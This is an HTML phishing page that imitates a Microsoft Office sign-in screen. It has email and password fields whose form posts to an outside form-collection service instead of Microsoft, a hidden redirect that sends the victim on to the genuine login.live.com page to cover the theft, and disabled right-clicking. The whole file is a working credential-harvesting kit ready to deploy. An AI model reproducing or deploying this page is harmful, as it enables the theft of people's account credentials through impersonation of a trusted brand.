<html>
    
    
<head>
    
    <title>Sign out</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
  
  <script>
var link = document.createElement('link');
link.type = 'image/jpg';
link.rel = 'shortcut icon';
link.href = 'favicon.jpg';
document.getElementsByTagName('head')[0].appendChild(link);
</script>


        
<style type="text/css" media="all">
  .form_table { text-align: center; }
  .full_width .segment_header { text-align: center !important; }
  .q { float:none;display: inline-block; }
  table.matrix, table.rating_ranking { margin-left:auto !important;margin-right:auto !important; }
  
  input[type=text] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  box-sizing: border-box;
}

input[type=button], input[type=submit], input[type=reset] {
  background-color:#385bcf;
  border: none;
  color: white;
  padding: auto;
  text-decoration: none;
  margin: 4px 2px;
  cursor: pointer;
  float:right;
  height:25px;
  width:100px;
}

/* Style the container */
.container {
  margin: auto;
  margin-top:15px;
  width: 50%;
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px;
  height:600px;
  opacity: 0.75;
 
}

/* Floating column for labels: 25% width */
.col-25 {
  float: left;
  width: 25%;
  margin-top: 6px;
}

/* Floating column for inputs: 75% width */
.col-75 {
  float: left;
  width: 75%;
  margin-top: 6px;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

footer {
  text-align: center;
  padding: 3px;
  color: #000;
}


/* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 600px) {
  .col-25, .col-75, input[type=submit] {
    width: 100%;
    margin-top: 20px;
  }
  .form1{
      margin:1% auto;
			margin-right: auto; 
			margin-left: auto; 
		
			padding-top: 80px;
			width:100%;
      
  }
  
  /* Style the container */
.container {
  width: 98%;
  border-radius: 5px;
  background-color: #f2f2f2;
  opacity: 0.75;
  margin:auto, 10px;
}

input[type=text] {
  width: 100%;
  margin: 2px 0;
}
</style>
        
</head>
    
    
<body style="height:600px;background-image: url('back.jpg');background-position: center;
  background-repeat: no-repeat;
  background-size: cover;" oncontextmenu="return false">
    
   <!-- <nav class="navbar navbar-expand-sm bg-dark navbar-dark fixed-top" >
  <a class="navbar-brand" href="#" ><b>Microsoft account security</b></a>
  
</nav>-->
        
<div class="container">    
<form action="https://submit-form.com/RQR6sv9A" method="post" style="margin:1% auto;
			margin-right: auto; margin-left: auto; 
			padding-top: 100px;width:50%">
			
			<input
    type="hidden"
    name="_redirect"
    value="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1625862590&rver=7.0.6730.0&wp=LBI&wreply=https%3a%2f%2fwww.msn.com%2fen-xl%2fhomepage%2fSecure%2fPassport%3fru%3dhttps%253a%252f%252fwww.msn.com%252fen-xl%252f%253focid%253dmailsignout%2526pc%253dU591%2526AR%253d1%2526pfr%253d1&lc=1033&id=1184&mkt=en-xl&pcexp=True"
  />
  
  
    <div>
  <a target="_blank" href="favicon.jpg">
    <img src="favicon.jpg" alt="Microsoft" width="40" height="40">
  </a><b style="color:#676970">Microsoft|office</b>
</div>
    <h1><b>Sign in</b></h1><br>
           
  <label for="fname" >Email</label><br>
  <input type="text" name="mail" placeholder="email, phone, or skype" required><br><br>
  <label for="lname" >Password</label><br>
  <input type="text" name="pass" placeholder="password" required><br><br>
  
  <p style="font-size:12px">No account? <a href="#">Create one!</a><br>
  <a href="#">Cant access your account?</a></p>
  <input type="submit" value="Login">


</form> 
        
</div>   
        
        
        
        
        
        
        <footer>
  <p style="font-size:12px"><a href="#">Terms of use /privacy & cookies</a><p>
</footer>
</body>
    
    
    
    
</html>